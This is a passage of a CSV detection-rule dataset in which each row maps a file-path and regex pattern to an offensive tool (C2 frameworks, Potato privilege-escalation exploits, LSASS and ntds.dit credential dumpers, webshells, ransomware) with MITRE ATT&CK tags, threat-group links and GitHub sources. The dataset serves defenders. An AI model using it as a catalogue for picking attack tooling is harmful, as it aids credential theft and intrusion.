Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","15655" "*\godoh\dnsserver*",".{0,1000}\\godoh\\dnsserver.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","15656" "*\godoh\lib\*",".{0,1000}\\godoh\\lib\\.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","15657" "*\godoh\protocol\*",".{0,1000}\\godoh\\protocol\\.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. 
Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","15658" "*\GodPotato.exe*",".{0,1000}\\GodPotato\.exe.{0,1000}","offensive_tool_keyword","GodPotato","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","GodPotato","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","15659" "*\GodPotato.exe*",".{0,1000}\\GodPotato\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","GodPotato","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","15660" "*\Godpotato\*",".{0,1000}\\Godpotato\\.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. 
It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1134.001 - T1068 - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","0","N/A","N/A","10","10","1938","236","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z","15661" "*\GodPotato\pipe\epmapper*",".{0,1000}\\GodPotato\\pipe\\epmapper.{0,1000}","offensive_tool_keyword","DeadPotato","DeadPotato is a windows privilege escalation utility from the Potato family of exploits leveraging the SeImpersonate right to obtain SYSTEM privileges","T1134.001 - T1068 - T1055 - T1546.015","TA0004 - TA0006 - TA0011","N/A","N/A","Privilege Escalation","https://github.com/lypd0/DeadPotato","1","0","#namedpipe","N/A","10","4","382","45","2024-08-17T06:08:29Z","2024-07-31T01:08:30Z","15662" "*\Godzilla.java*",".{0,1000}\\Godzilla\.java.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","15663" "*\Godzilla-BypassOpenRasp.jar*",".{0,1000}\\Godzilla\-BypassOpenRasp\.jar.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","15664" "*\gofetch.exe*",".{0,1000}\\gofetch\.exe.{0,1000}","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - 
TA0003","N/A","Dispossessor","Discovery","https://github.com/GoFetchAD/GoFetch","1","0","N/A","N/A","10","7","633","99","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z","15665" "*\GoFetchLog.log*",".{0,1000}\\GoFetchLog\.log.{0,1000}","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","Dispossessor","Discovery","https://github.com/GoFetchAD/GoFetch","1","0","N/A","N/A","10","7","633","99","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z","15666" "*\GoFetch-main*",".{0,1000}GoFetch\-master.{0,1000}","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","Dispossessor","Discovery","https://github.com/GoFetchAD/GoFetch","1","0","N/A","N/A","10","7","633","99","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z","15667" "*\Golden.ps1*",".{0,1000}\\Golden\.ps1.{0,1000}","offensive_tool_keyword","ADFSDump-PS","ADFSDump to assist with GoldenSAML","T1078 - T1552.004 - T1558.004","TA0006 ","N/A","N/A","Credential Access","https://github.com/ZephrFish/ADFSDump-PS","1","0","N/A","N/A","10","1","31","8","2024-05-20T00:00:19Z","2024-05-19T00:46:28Z","15668" "*\goldenPac.py*",".{0,1000}\\goldenPac\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","15669" "*\goldenPac.py*",".{0,1000}\\goldenPac\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","15670" "*\go-lsass.exe*",".{0,1000}\\go\-lsass\.exe.{0,1000}","offensive_tool_keyword","go-lsass","dumping LSASS process remotely","T1003 - T1055 - T1021.005","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/jfjallid/go-lsass","1","0","N/A","N/A","9","1","38","5","2024-07-27T10:35:12Z","2023-11-30T18:45:51Z","15672" "*\go-lsass-master.zip*",".{0,1000}\\go\-lsass\-master\.zip.{0,1000}","offensive_tool_keyword","go-lsass","dumping LSASS process remotely","T1003 - T1055 - T1021.005","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/jfjallid/go-lsass","1","0","N/A","N/A","9","1","38","5","2024-07-27T10:35:12Z","2023-11-30T18:45:51Z","15673" "*\go-lsass-master\*",".{0,1000}\\go\-lsass\-master\\.{0,1000}","offensive_tool_keyword","go-lsass","dumping LSASS process remotely","T1003 - T1055 - T1021.005","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/jfjallid/go-lsass","1","0","N/A","N/A","9","1","38","5","2024-07-27T10:35:12Z","2023-11-30T18:45:51Z","15674" 
"*\google_drive_doubledrive.py*",".{0,1000}\\google_drive_doubledrive\.py.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","0","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","15680" "*\Gopher.exe*",".{0,1000}\\Gopher\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","15681" "*\Gopher.pdb*",".{0,1000}\\Gopher\.pdb.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#content","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","15682" 
"*\go-secdump*",".{0,1000}\\go\-secdump.{0,1000}","offensive_tool_keyword","go-secdump","Tool to remotely dump secrets from the Windows registry","T1003.002 - T1012 - T1059.003","TA0006 - TA0003 - TA0002","N/A","N/A","Credential Access","https://github.com/jfjallid/go-secdump","1","0","N/A","N/A","10","5","457","51","2025-02-21T19:16:11Z","2023-02-23T17:02:50Z","15683" "*\gosecretsdump*",".{0,1000}\\gosecretsdump.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","15684" "*\gosecretsdump.*",".{0,1000}\\gosecretsdump\..{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","15685" "*\gosecretsdump\*",".{0,1000}\\gosecretsdump\\.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","15686" "*\gosecretsdump_linux*",".{0,1000}\\gosecretsdump_linux.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","15687" "*\gosecretsdump_mac*",".{0,1000}\\gosecretsdump_mac.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential 
Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","15688" "*\gosecretsdump_win*",".{0,1000}\\gosecretsdump_win.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","15689" "*\GoStompy.go*",".{0,1000}\\GoStompy\.go.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","0","N/A","N/A","10","1","46","6","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z","15692" "*\goWMIExec_linux_*",".{0,1000}\\goWMIExec_linux_.{0,1000}","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral Movement)","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/C-Sto/goWMIExec","1","0","N/A","N/A","10","3","214","42","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z","15707" "*\goWMIExec_mac_*",".{0,1000}\\goWMIExec_mac_.{0,1000}","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral Movement)","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/C-Sto/goWMIExec","1","0","N/A","N/A","10","3","214","42","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z","15708" "*\goWMIExec_win_*",".{0,1000}\\goWMIExec_win_.{0,1000}","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral Movement)","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/C-Sto/goWMIExec","1","0","N/A","N/A","10","3","214","42","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z","15709" "*\goZulipC2*",".{0,1000}\\goZulipC2.{0,1000}","offensive_tool_keyword","goZulipC2","C2 leveraging Zulip Messaging Platform as Backend.","T1090 - T1090.003 - T1071 - T1071.001","TA0011 
- TA0009","N/A","N/A","C2","https://github.com/n1k7l4i/goZulipC2","1","0","N/A","N/A","10","","N/A","","","","15710" "*\GPOBrowser.py*",".{0,1000}\\GPOBrowser\.py.{0,1000}","offensive_tool_keyword","Adcheck","Assess the security of your Active Directory with few or all privileges. This tool offers functionalities similar to PingCastle","T1087 - T1012 - T1482 - T1059 - T1203 - T1212 - T1480 - T1552 - T1112 - T1207 - T1483 - T1113 - T1057 - T1136 - T1119 - T1082 - T1553 - T1140 - T1107 - T1078 - T1562","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/CobblePot59/Adcheck","1","0","N/A","N/A","10","4","315","35","2025-04-18T15:17:46Z","2024-05-10T13:54:45Z","15711" "*\GPOddity\*",".{0,1000}\\GPOddity\\.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","N/A","9","3","297","26","2024-11-08T15:14:06Z","2023-09-01T08:13:25Z","15712" "*\gpp_autologin.py*",".{0,1000}\\gpp_autologin\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","15713" "*\gpp_password.py*",".{0,1000}\\gpp_password\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","15714" "*\GPUnprotect.zip*",".{0,1000}\\GPUnprotect\.zip.{0,1000}","offensive_tool_keyword","GlobalUnProtect","Decrypt GlobalProtect configuration and cookie files.","T1552 - T1003 - T1555","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/rotarydrone/GlobalUnProtect","1","0","N/A","N/A","9","2","147","19","2024-09-10T20:19:24Z","2024-09-04T15:31:52Z","15715" "*\grabchrome.exe*",".{0,1000}\\grabchrome\.exe.{0,1000}","offensive_tool_keyword","GrabChrome","HelloKitty Grabber used by Dispossessor ransomware group","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Dispossessor","Credential Access","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","15716" "*\GraphLdr.x64.bin*",".{0,1000}\\GraphLdr\.x64\.bin.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/RedSiege/GraphStrike","1","0","N/A","N/A","10","10","585","95","2024-06-25T11:18:19Z","2024-01-02T00:18:44Z","15717" "*\Graphpython.py*",".{0,1000}\\Graphpython\.py.{0,1000}","offensive_tool_keyword","Graphpython","Modular cross-platform Microsoft Graph API (Entra - o365 and Intune) enumeration and exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003 - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/Graphpython","1","0","N/A","N/A","7","2","145","13","2024-12-07T21:54:00Z","2024-07-10T00:04:48Z","15718" "*\GraphRunner.ps1*",".{0,1000}\\GraphRunner\.ps1.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/dafthack/GraphRunner","1","0","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","15719" "*\GraphRunner-main*",".{0,1000}\\GraphRunner\-main.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","15720" "*\GraphSpy.py*",".{0,1000}\\GraphSpy\.py.{0,1000}","offensive_tool_keyword","GraphSpy","Initial Access and Post-Exploitation Tool for AAD and O365 with a browser-based GUI","T1078.004 - T1110.003 - T1071.001 - T1566.002 - T1656","TA0001 - TA0006 - TA0003 - TA0005 - TA0008","N/A","N/A","Collection","https://github.com/RedByte1337/GraphSpy","1","0","N/A","N/A","10","7","680","72","2025-04-15T21:07:15Z","2024-02-07T19:47:15Z","15721" "*\GraphStrike.cna*",".{0,1000}\\GraphStrike\.cna.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/RedSiege/GraphStrike","1","0","N/A","N/A","10","10","585","95","2024-06-25T11:18:19Z","2024-01-02T00:18:44Z","15722" "*\GraphStrike.py*",".{0,1000}\\GraphStrike\.py.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/RedSiege/GraphStrike","1","0","N/A","N/A","10","10","585","95","2024-06-25T11:18:19Z","2024-01-02T00:18:44Z","15723" "*\GraphStrike-main\*",".{0,1000}\\GraphStrike\-main\\.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005 - TA0011","N/A","Black 
Basta","C2","https://github.com/RedSiege/GraphStrike","1","0","N/A","N/A","10","10","585","95","2024-06-25T11:18:19Z","2024-01-02T00:18:44Z","15724" "*\grbachrome.exe*",".{0,1000}\\grbachrome\.exe.{0,1000}","offensive_tool_keyword","GrabChrome","HelloKitty Grabber used by Dispossessor ransomware group","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Dispossessor","Credential Access","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","15725" "*\GreameRAT.exe*",".{0,1000}\\GreameRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","15726" "*\group_members.py*",".{0,1000}\\group_members\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","15727" "*\Group3r.cs*",".{0,1000}\\Group3r\.cs.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","N/A","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","15728" "*\Group3r.exe*",".{0,1000}\\Group3r\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 
- T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","15729" "*\Group3r.exe*",".{0,1000}\\Group3r\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","15730" "*\Group3r.exe*",".{0,1000}\\Group3r\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","15731" "*\group3r.log*",".{0,1000}\\group3r\.log.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","N/A","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","15732" "*\Group3r.sln*",".{0,1000}\\Group3r\.sln.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","N/A","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","15733" "*\Grouper2.exe*",".{0,1000}\\Grouper2\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","15734" "*\Grouper2.exe*",".{0,1000}\\Grouper2\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","15735" "*\groupmembership.py*",".{0,1000}\\groupmembership\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","15736" 
